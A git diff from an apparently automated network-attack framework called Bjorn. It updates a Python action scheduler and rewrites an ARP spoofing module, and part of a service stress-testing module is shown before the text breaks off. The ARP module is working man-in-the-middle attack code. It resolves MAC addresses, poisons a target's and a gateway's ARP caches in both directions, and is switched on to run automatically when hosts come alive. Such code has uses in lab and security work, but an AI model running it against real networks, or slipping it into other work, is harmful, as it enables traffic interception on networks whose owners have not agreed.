inserted = self.db.ensure_scheduled_occurrence( inserted = self.db.ensure_scheduled_occurrence(
action_name=action_name, action_name=action_name,
next_run_at=scheduled_for, next_run_at=scheduled_for,
@@ -317,7 +668,7 @@ class ActionScheduler:
priority=int(action_def.get("b_priority", 40) or 40), priority=int(action_def.get("b_priority", 40) or 40),
trigger="scheduler", trigger="scheduler",
tags=action_def.get("b_tags", []), tags=action_def.get("b_tags", []),
metadata={"interval": interval, "is_global": True}, metadata=metadata,
max_retries=int(action_def.get("b_max_retries", 3) or 3), max_retries=int(action_def.get("b_max_retries", 3) or 3),
) )
if inserted: if inserted:
@@ -354,6 +705,23 @@ class ActionScheduler:
next_run = _utcnow() if not last else (last + timedelta(seconds=interval)) next_run = _utcnow() if not last else (last + timedelta(seconds=interval))
scheduled_for = _db_ts(next_run) scheduled_for = _db_ts(next_run)
metadata = {
"interval": interval,
"is_global": False,
"decision_method": "heuristic",
"decision_origin": "heuristic",
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context={
"mac": mac,
"hostname": (host.get("hostnames") or "").split(";")[0],
"ports": [int(p) for p in (host.get("ports") or "").split(";") if p.isdigit()],
},
decision_scope="scheduled_host",
)
inserted = self.db.ensure_scheduled_occurrence( inserted = self.db.ensure_scheduled_occurrence(
action_name=action_name, action_name=action_name,
next_run_at=scheduled_for, next_run_at=scheduled_for,
@@ -362,7 +730,7 @@ class ActionScheduler:
priority=int(action_def.get("b_priority", 40) or 40), priority=int(action_def.get("b_priority", 40) or 40),
trigger="scheduler", trigger="scheduler",
tags=action_def.get("b_tags", []), tags=action_def.get("b_tags", []),
metadata={"interval": interval, "is_global": False}, metadata=metadata,
max_retries=int(action_def.get("b_max_retries", 3) or 3), max_retries=int(action_def.get("b_max_retries", 3) or 3),
) )
if inserted: if inserted:
@@ -382,7 +750,7 @@ class ActionScheduler:
for action in self._action_definitions.values(): for action in self._action_definitions.values():
if (action.get("b_action") or "normal") != "global": if (action.get("b_action") or "normal") != "global":
continue continue
if int(action.get("b_enabled", 1)) != 1: if not self._is_action_enabled(action):
continue continue
trigger = (action.get("b_trigger") or "").strip() trigger = (action.get("b_trigger") or "").strip()
@@ -409,14 +777,13 @@ class ActionScheduler:
continue continue
# Queue the action # Queue the action
self._queue_global_action(action) if self._queue_global_action(action):
self._last_global_runs[action_name] = time.time() self._last_global_runs[action_name] = time.time()
logger.info(f"Queued global action {action_name}")
except Exception as e: except Exception as e:
logger.error(f"Error evaluating global actions: {e}") logger.error(f"Error evaluating global actions: {e}")
def _queue_global_action(self, action_def: Dict[str, Any]): def _queue_global_action(self, action_def: Dict[str, Any]) -> bool:
"""Queue a global action for execution (idempotent insert).""" """Queue a global action for execution (idempotent insert)."""
action_name = action_def["b_class"] action_name = action_def["b_class"]
mac = self.ctrl_mac mac = self.ctrl_mac
@@ -429,12 +796,30 @@ class ActionScheduler:
"requirements": action_def.get("b_requires", ""), "requirements": action_def.get("b_requires", ""),
"timeout": timeout, "timeout": timeout,
"is_global": True, "is_global": True,
"decision_method": "heuristic",
"decision_origin": "heuristic",
} }
# Global context (controller itself)
context = {
"mac": mac,
"hostname": "Bjorn-C2",
"ports": [] # Global actions usually don't target specific ports on controller
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context=context,
decision_scope="queue_global",
)
ai_conf = metadata.get("ai_confidence")
if isinstance(ai_conf, (int, float)) and metadata.get("decision_origin") == "ai_confirmed":
action_def["b_priority"] = int(action_def.get("b_priority", 50) or 50) + int(20 * float(ai_conf))
try: try:
self._ensure_host_exists(mac) self._ensure_host_exists(mac)
# Guard with NOT EXISTS to avoid races # Guard with NOT EXISTS to avoid races
self.db.execute( affected = self.db.execute(
""" """
INSERT INTO action_queue ( INSERT INTO action_queue (
action_name, mac_address, ip, port, hostname, service, action_name, mac_address, ip, port, hostname, service,
@@ -463,8 +848,13 @@ class ActionScheduler:
mac, mac,
), ),
) )
if affected and affected > 0:
self._log_queue_decision(action_name=action_name, mac=mac, metadata=metadata)
return True
return False
except Exception as e: except Exception as e:
logger.error(f"Failed to queue global action {action_name}: {e}") logger.error(f"Failed to queue global action {action_name}: {e}")
return False
# ------------------------------------------------------------- host path # ------------------------------------------------------------- host path
@@ -480,7 +870,7 @@ class ActionScheduler:
continue continue
# Skip disabled actions # Skip disabled actions
if not int(action_def.get("b_enabled", 1)): if not self._is_action_enabled(action_def):
continue continue
trigger = (action_def.get("b_trigger") or "").strip() trigger = (action_def.get("b_trigger") or "").strip()
@@ -509,7 +899,6 @@ class ActionScheduler:
# Queue the action # Queue the action
self._queue_action(host, action_def, target_port, target_service) self._queue_action(host, action_def, target_port, target_service)
logger.info(f"Queued {action_name} for {mac} (port={target_port}, service={target_service})")
def _resolve_target_port_service( def _resolve_target_port_service(
self, mac: str, host: Dict[str, Any], action_def: Dict[str, Any] self, mac: str, host: Dict[str, Any], action_def: Dict[str, Any]
@@ -640,7 +1029,7 @@ class ActionScheduler:
def _queue_action( def _queue_action(
self, host: Dict[str, Any], action_def: Dict[str, Any], target_port: Optional[int], target_service: Optional[str] self, host: Dict[str, Any], action_def: Dict[str, Any], target_port: Optional[int], target_service: Optional[str]
): ) -> bool:
"""Queue action for execution (idempotent insert with NOT EXISTS guard).""" """Queue action for execution (idempotent insert with NOT EXISTS guard)."""
action_name = action_def["b_class"] action_name = action_def["b_class"]
mac = host["mac_address"] mac = host["mac_address"]
@@ -653,11 +1042,29 @@ class ActionScheduler:
"requirements": action_def.get("b_requires", ""), "requirements": action_def.get("b_requires", ""),
"is_global": False, "is_global": False,
"timeout": timeout, "timeout": timeout,
"decision_method": "heuristic",
"decision_origin": "heuristic",
"ports_snapshot": host.get("ports") or "", "ports_snapshot": host.get("ports") or "",
} }
context = {
"mac": mac,
"hostname": (host.get("hostnames") or "").split(";")[0],
"ports": [int(p) for p in (host.get("ports") or "").split(";") if p.isdigit()],
}
self._annotate_decision_metadata(
metadata=metadata,
action_name=action_name,
context=context,
decision_scope="queue_host",
)
ai_conf = metadata.get("ai_confidence")
if isinstance(ai_conf, (int, float)) and metadata.get("decision_origin") == "ai_confirmed":
# Apply small priority boost only when AI confirmed this exact action.
action_def["b_priority"] = int(action_def.get("b_priority", 50) or 50) + int(20 * float(ai_conf))
try: try:
self.db.execute( affected = self.db.execute(
""" """
INSERT INTO action_queue ( INSERT INTO action_queue (
action_name, mac_address, ip, port, hostname, service, action_name, mac_address, ip, port, hostname, service,
@@ -690,8 +1097,19 @@ class ActionScheduler:
self_port, self_port,
), ),
) )
if affected and affected > 0:
self._log_queue_decision(
action_name=action_name,
mac=mac,
metadata=metadata,
target_port=target_port,
target_service=target_service,
)
return True
return False
except Exception as e: except Exception as e:
logger.error(f"Failed to queue {action_name} for {mac}: {e}") logger.error(f"Failed to queue {action_name} for {mac}: {e}")
return False
# ------------------------------------------------------------- last times # ------------------------------------------------------------- last times
@@ -708,7 +1126,11 @@ class ActionScheduler:
) )
if row and row[0].get("completed_at"): if row and row[0].get("completed_at"):
try: try:
return datetime.fromisoformat(row[0]["completed_at"]) val = row[0]["completed_at"]
if isinstance(val, str):
return datetime.fromisoformat(val)
elif isinstance(val, datetime):
return val
except Exception: except Exception:
return None return None
return None return None
@@ -726,7 +1148,11 @@ class ActionScheduler:
) )
if row and row[0].get("completed_at"): if row and row[0].get("completed_at"):
try: try:
return datetime.fromisoformat(row[0]["completed_at"]) val = row[0]["completed_at"]
if isinstance(val, str):
return datetime.fromisoformat(val)
elif isinstance(val, datetime):
return val
except Exception: except Exception:
return None return None
return None return None
@@ -840,19 +1266,7 @@ class ActionScheduler:
except Exception as e: except Exception as e:
logger.error(f"Failed to cleanup queue: {e}") logger.error(f"Failed to cleanup queue: {e}")
def update_priorities(self): # update_priorities is defined above (line ~166); this duplicate is removed.
"""Boost priority for actions waiting too long (anti-starvation)."""
try:
self.db.execute(
"""
UPDATE action_queue
SET priority = MIN(100, priority + 1)
WHERE status='pending'
AND julianday('now') - julianday(created_at) > 0.0417
"""
)
except Exception as e:
logger.error(f"Failed to update priorities: {e}")
# =================================================================== helpers == # =================================================================== helpers ==

Binary file not shown.

Before

Width:  |  Height:  |  Size: 40 KiB

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 29 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 114 KiB

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 162 KiB

After

Width:  |  Height:  |  Size: 16 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 33 KiB

After

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 175 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 25 KiB

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 178 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 185 KiB

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 138 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 70 KiB

After

Width:  |  Height:  |  Size: 7.1 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 76 KiB

After

Width:  |  Height:  |  Size: 6.6 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 2.2 MiB

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 181 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 221 KiB

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 181 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 154 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 159 KiB

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 155 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 137 KiB

After

Width:  |  Height:  |  Size: 15 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 30 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 30 KiB

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 27 KiB

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 24 KiB

After

Width:  |  Height:  |  Size: 21 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 19 KiB

After

Width:  |  Height:  |  Size: 14 KiB

View File

@@ -1,163 +1,330 @@
# AARP Spoofer by poisoning the ARP cache of a target and a gateway. """
# Saves settings (target, gateway, interface, delay) in `/home/bjorn/.settings_bjorn/arpspoofer_settings.json`. arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
# Automatically loads saved settings if arguments are not provided.
# -t, --target IP address of the target device (overrides saved value). Ethical cybersecurity lab action for Bjorn framework.
# -g, --gateway IP address of the gateway (overrides saved value). Performs bidirectional ARP spoofing between a target host and the network
# -i, --interface Network interface (default: primary or saved). gateway. Restores ARP tables on completion or interruption.
# -d, --delay Delay between ARP packets in seconds (default: 2 or saved).
# - First time: python arpspoofer.py -t TARGET -g GATEWAY -i INTERFACE -d DELAY SQL mode:
# - Subsequent: python arpspoofer.py (uses saved settings). - Orchestrator provides (ip, port, row) for the target host.
# - Update: Provide any argument to override saved values. - Gateway IP is auto-detected from system routing table or shared config.
- Results persisted to JSON output and logged for RL training.
- Fully integrated with EPD display (progress, status, comments).
"""
import os import os
import json
import time import time
import argparse import logging
from scapy.all import ARP, send, sr1, conf import json
import subprocess
import datetime
from typing import Dict, Optional, Tuple
from shared import SharedData
from logger import Logger
logger = Logger(name="arp_spoofer.py", level=logging.DEBUG)
# Silence scapy warnings
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy").setLevel(logging.ERROR)
# ──────────────────────── Action Metadata ────────────────────────
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_status = "arp_spoof"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "aggressive"
b_category = "network_attack"
b_name = "ARP Spoofer"
b_description = (
"Bidirectional ARP cache poisoning between target host and gateway for "
"MITM positioning. Detects gateway automatically, spoofs both directions, "
"and cleanly restores ARP tables on completion. Educational lab use only."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ARPSpoof.png"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 30
b_cooldown = 3600
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 2
b_risk_level = "high"
b_enabled = 1
b_tags = ["mitm", "arp", "network", "layer2"]
b_args = {
"duration": {
"type": "slider", "label": "Duration (s)",
"min": 10, "max": 300, "step": 10, "default": 60,
"help": "How long to maintain the ARP poison (seconds)."
},
"interval": {
"type": "slider", "label": "Packet interval (s)",
"min": 1, "max": 10, "step": 1, "default": 2,
"help": "Delay between ARP poison packets."
},
}
b_examples = [
{"duration": 60, "interval": 2},
{"duration": 120, "interval": 1},
]
b_docs_url = "docs/actions/ARPSpoof.md"
# ──────────────────────── Constants ──────────────────────────────
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "arp")
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_enabled = 0
# Folder and file for settings
SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(SETTINGS_DIR, "arpspoofer_settings.json")
class ARPSpoof: class ARPSpoof:
def __init__(self, target_ip, gateway_ip, interface, delay): """ARP cache poisoning action integrated with Bjorn orchestrator."""
self.target_ip = target_ip
self.gateway_ip = gateway_ip
self.interface = interface
self.delay = delay
conf.iface = self.interface # Set the interface
print(f"ARPSpoof initialized with target IP: {self.target_ip}, gateway IP: {self.gateway_ip}, interface: {self.interface}, delay: {self.delay}s")
def get_mac(self, ip): def __init__(self, shared_data: SharedData):
"""Gets the MAC address of a target IP by sending an ARP request.""" self.shared_data = shared_data
print(f"Retrieving MAC address for IP: {ip}") self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self._scapy_ok = False
self._check_scapy()
try: try:
arp_request = ARP(pdst=ip) os.makedirs(OUTPUT_DIR, exist_ok=True)
response = sr1(arp_request, timeout=2, verbose=False) except OSError:
if response: pass
print(f"MAC address found for {ip}: {response.hwsrc}") logger.info("ARPSpoof initialized")
return response.hwsrc
else: def _check_scapy(self):
print(f"No ARP response received for IP {ip}") try:
return None from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
self._scapy_ok = True
except ImportError:
logger.error("scapy not available — ARPSpoof will not function")
self._scapy_ok = False
# ─────────────────── Identity Cache ──────────────────────
def _refresh_ip_identity_cache(self):
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e: except Exception as e:
print(f"Error retrieving MAC address for {ip}: {e}") logger.error(f"DB get_all_hosts failed: {e}")
return None rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hn = (r.get("hostnames") or "").split(";", 1)[0]
for ip_addr in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, hn)
def spoof(self, target_ip, spoof_ip): def _mac_for_ip(self, ip: str) -> Optional[str]:
"""Sends an ARP packet to spoof the target into believing the attacker's IP is the spoofed IP.""" if ip not in self._ip_to_identity:
print(f"Preparing ARP spoofing for target {target_ip}, pretending to be {spoof_ip}") self._refresh_ip_identity_cache()
target_mac = self.get_mac(target_ip) return self._ip_to_identity.get(ip, (None, None))[0]
spoof_mac = self.get_mac(spoof_ip)
if not target_mac or not spoof_mac:
print(f"Cannot find MAC address for target {target_ip} or {spoof_ip}, spoofing aborted")
return
# ─────────────────── Gateway Detection ──────────────────
def _detect_gateway(self) -> Optional[str]:
"""Auto-detect the default gateway IP."""
gw = getattr(self.shared_data, "gateway_ip", None)
if gw and gw != "0.0.0.0":
return gw
try: try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac) result = subprocess.run(
send(arp_response, verbose=False) ["ip", "route", "show", "default"],
print(f"Spoofed ARP packet sent to {target_ip} claiming to be {spoof_ip}") capture_output=True, text=True, timeout=5
)
if result.returncode == 0 and result.stdout.strip():
parts = result.stdout.strip().split("\n")[0].split()
idx = parts.index("via") if "via" in parts else -1
if idx >= 0 and idx + 1 < len(parts):
return parts[idx + 1]
except Exception as e: except Exception as e:
print(f"Error sending ARP packet to {target_ip}: {e}") logger.debug(f"Gateway detection via ip route failed: {e}")
def restore(self, target_ip, spoof_ip):
"""Sends an ARP packet to restore the legitimate IP/MAC mapping for the target and spoof IP."""
print(f"Restoring ARP association for {target_ip} using {spoof_ip}")
target_mac = self.get_mac(target_ip)
gateway_mac = self.get_mac(spoof_ip)
if not target_mac or not gateway_mac:
print(f"Cannot restore ARP, MAC addresses not found for {target_ip} or {spoof_ip}")
return
try: try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=gateway_mac) from scapy.all import conf as scapy_conf
send(arp_response, verbose=False, count=5) gw = scapy_conf.route.route("0.0.0.0")[2]
print(f"ARP association restored between {spoof_ip} and {target_mac}") if gw and gw != "0.0.0.0":
return gw
except Exception as e: except Exception as e:
print(f"Error restoring ARP association for {target_ip}: {e}") logger.debug(f"Gateway detection via scapy failed: {e}")
return None
def execute(self): # ─────────────────── ARP Operations ──────────────────────
"""Executes the ARP spoofing attack.""" @staticmethod
def _get_mac_via_arp(ip: str, iface: str = None, timeout: float = 2.0) -> Optional[str]:
"""Resolve IP to MAC via ARP request."""
try: try:
print(f"Starting ARP Spoofing attack on target {self.target_ip} via gateway {self.gateway_ip}") from scapy.all import ARP, sr1
kwargs = {"timeout": timeout, "verbose": False}
if iface:
kwargs["iface"] = iface
resp = sr1(ARP(pdst=ip), **kwargs)
if resp and hasattr(resp, "hwsrc"):
return resp.hwsrc
except Exception as e:
logger.debug(f"ARP resolution failed for {ip}: {e}")
return None
while True: @staticmethod
target_mac = self.get_mac(self.target_ip) def _send_arp_poison(target_ip, target_mac, spoof_ip, iface=None):
gateway_mac = self.get_mac(self.gateway_ip) """Send a single ARP poison packet (op=is-at)."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip
)
kwargs = {"verbose": False}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP poison send failed to {target_ip}: {e}")
if not target_mac or not gateway_mac: @staticmethod
print(f"Error retrieving MAC addresses, stopping ARP Spoofing") def _send_arp_restore(target_ip, target_mac, real_ip, real_mac, iface=None):
self.restore(self.target_ip, self.gateway_ip) """Restore legitimate ARP mapping with multiple packets."""
self.restore(self.gateway_ip, self.target_ip) try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac,
psrc=real_ip, hwsrc=real_mac
)
kwargs = {"verbose": False, "count": 5}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP restore failed for {target_ip}: {e}")
# ─────────────────── Main Execute ────────────────────────
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""Execute bidirectional ARP spoofing against target host."""
self.shared_data.bjorn_orch_status = "ARPSpoof"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip}
if not self._scapy_ok:
logger.error("scapy unavailable, cannot perform ARP spoof")
return "failed"
target_mac = None
gateway_mac = None
gateway_ip = None
iface = None
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or ""
hostname = row.get("Hostname") or row.get("hostname") or ""
# 1) Detect gateway
gateway_ip = self._detect_gateway()
if not gateway_ip:
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
return "failed"
if gateway_ip == ip:
logger.warning(f"Target {ip} IS the gateway — skipping")
return "failed"
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
self.shared_data.log_milestone(b_class, "GatewayID", f"Poisoning {ip} <-> {gateway_ip}")
self.shared_data.comment_params = {"ip": ip, "gateway": gateway_ip}
self.shared_data.bjorn_progress = "10%"
# 2) Resolve MACs
iface = getattr(self.shared_data, "default_network_interface", None)
target_mac = self._get_mac_via_arp(ip, iface)
gateway_mac = self._get_mac_via_arp(gateway_ip, iface)
if not target_mac:
logger.error(f"Cannot resolve MAC for target {ip}")
return "failed"
if not gateway_mac:
logger.error(f"Cannot resolve MAC for gateway {gateway_ip}")
return "failed"
self.shared_data.bjorn_progress = "20%"
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
# 3) Spoofing loop
duration = int(getattr(self.shared_data, "arp_spoof_duration", 60))
interval = max(1, int(getattr(self.shared_data, "arp_spoof_interval", 2)))
packets_sent = 0
start_time = time.time()
while (time.time() - start_time) < duration:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit — stopping ARP spoof")
break break
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
packets_sent += 2
print(f"Sending ARP packets to poison {self.target_ip} and {self.gateway_ip}") elapsed = time.time() - start_time
self.spoof(self.target_ip, self.gateway_ip) pct = min(90, int(20 + (elapsed / max(duration, 1)) * 70))
self.spoof(self.gateway_ip, self.target_ip) self.shared_data.bjorn_progress = f"{pct}%"
if packets_sent % 20 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Injected {packets_sent} poison pkts")
time.sleep(self.delay) time.sleep(interval)
# 4) Restore ARP tables
self.shared_data.bjorn_progress = "95%"
logger.info("Restoring ARP tables...")
self.shared_data.log_milestone(b_class, "RestoreStart", f"Healing {ip} and {gateway_ip}")
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
# 5) Save results
elapsed_total = time.time() - start_time
result_data = {
"timestamp": datetime.datetime.now().isoformat(),
"target_ip": ip, "target_mac": target_mac,
"gateway_ip": gateway_ip, "gateway_mac": gateway_mac,
"duration_s": round(elapsed_total, 1),
"packets_sent": packets_sent,
"hostname": hostname, "mac_address": mac
}
try:
ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
out_file = os.path.join(OUTPUT_DIR, f"arp_spoof_{ip}_{ts}.json")
with open(out_file, "w") as f:
json.dump(result_data, f, indent=2)
except Exception as e:
logger.error(f"Failed to save results: {e}")
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Restored tables after {packets_sent} pkts")
return "success"
except KeyboardInterrupt:
print("Attack interrupted. Restoring ARP tables.")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
print("ARP Spoofing stopped and ARP tables restored.")
except Exception as e: except Exception as e:
print(f"Unexpected error during ARP Spoofing attack: {e}") logger.error(f"ARPSpoof failed for {ip}: {e}")
if target_mac and gateway_mac and gateway_ip:
try:
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
logger.info("Emergency ARP restore sent after error")
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
def save_settings(target, gateway, interface, delay):
"""Saves the ARP spoofing settings to a JSON file."""
try:
os.makedirs(SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"gateway": gateway,
"interface": interface,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as file:
json.dump(settings, file)
print(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
print(f"Failed to save settings: {e}")
def load_settings():
"""Loads the ARP spoofing settings from a JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as file:
return json.load(file)
except Exception as e:
print(f"Failed to load settings: {e}")
return {}
if __name__ == "__main__": if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP Spoofing Attack Script") shared_data = SharedData()
parser.add_argument("-t", "--target", help="IP address of the target device") try:
parser.add_argument("-g", "--gateway", help="IP address of the gateway") spoofer = ARPSpoof(shared_data)
parser.add_argument("-i", "--interface", default=conf.iface, help="Network interface to use (default: primary interface)") logger.info("ARPSpoof module ready.")
parser.add_argument("-d", "--delay", type=float, default=2, help="Delay between ARP packets in seconds (default: 2 seconds)") except Exception as e:
args = parser.parse_args() logger.error(f"Error: {e}")
# Load saved settings and override with CLI arguments
settings = load_settings()
target_ip = args.target or settings.get("target")
gateway_ip = args.gateway or settings.get("gateway")
interface = args.interface or settings.get("interface")
delay = args.delay or settings.get("delay")
if not target_ip or not gateway_ip:
print("Target and Gateway IPs are required. Use -t and -g or save them in the settings file.")
exit(1)
# Save the settings for future use
save_settings(target_ip, gateway_ip, interface, delay)
# Execute the attack
spoof = ARPSpoof(target_ip=target_ip, gateway_ip=gateway_ip, interface=interface, delay=delay)
spoof.execute()

View File

@@ -1,315 +1,617 @@
# Resource exhaustion testing tool for network and service stress analysis. #!/usr/bin/env python3
# Saves settings in `/home/bjorn/.settings_bjorn/berserker_force_settings.json`. # -*- coding: utf-8 -*-
# Automatically loads saved settings if arguments are not provided. """
# -t, --target Target IP or hostname to test. berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
# -p, --ports Ports to test (comma-separated, default: common ports).
# -m, --mode Test mode (syn, udp, http, mixed, default: mixed). What it does:
# -r, --rate Packets per second (default: 100). - Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stress). - Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
(scapy), HTTP probes (urllib), or mixed mode.
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
target's response times change under light load. Max 50 req/s to stay RPi-safe.
Output is saved to data/output/stress/<ip>_<timestamp>.json
"""
import os
import json import json
import argparse
from datetime import datetime
import logging import logging
import threading import os
import time
import queue
import socket
import random import random
import requests import socket
from scapy.all import * import ssl
import psutil import statistics
from collections import defaultdict import time
import threading
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple
from urllib.request import Request, urlopen
from urllib.error import URLError
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="berserker_force.py", level=logging.DEBUG)
# -------------------- Scapy (optional) ----------------------------------------
_HAS_SCAPY = False
try:
from scapy.all import IP, TCP, sr1, conf as scapy_conf # type: ignore
_HAS_SCAPY = True
except ImportError:
logger.info("scapy not available -- SYN probe mode will fall back to TCP connect")
# -------------------- Action metadata (AST-friendly) --------------------------
b_class = "BerserkerForce" b_class = "BerserkerForce"
b_module = "berserker_force" b_module = "berserker_force"
b_enabled = 0 b_status = "berserker_force"
b_port = None
b_parent = None
b_service = '[]'
b_trigger = "on_port_change"
b_action = "aggressive"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 15
b_cooldown = 7200
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 1
b_risk_level = "high"
b_enabled = 1
# Configure logging b_category = "stress"
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') b_name = "Berserker Force"
b_description = (
"Service resilience and stress-testing action. Measures baseline response "
"times, applies controlled TCP/SYN/HTTP load, then re-measures to quantify "
"degradation. Rate-limited to 50 req/s max (RPi-safe). No actual DoS -- "
"just measured probing with structured JSON reporting."
)
b_author = "Bjorn Community"
b_version = "2.0.0"
b_icon = "BerserkerForce.png"
# Default settings b_tags = ["stress", "availability", "resilience"]
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stress"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn" b_args = {
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "berserker_force_settings.json") "mode": {
DEFAULT_PORTS = [21, 22, 23, 25, 80, 443, 445, 3306, 3389, 5432] "type": "select",
"label": "Probe mode",
"choices": ["tcp", "syn", "http", "mixed"],
"default": "tcp",
"help": "tcp = connect probe, syn = SYN via scapy (needs root), "
"http = urllib GET for web ports, mixed = random pick per probe.",
},
"duration": {
"type": "slider",
"label": "Stress duration (s)",
"min": 10,
"max": 120,
"step": 5,
"default": 30,
"help": "How long the stress phase runs in seconds.",
},
"rate": {
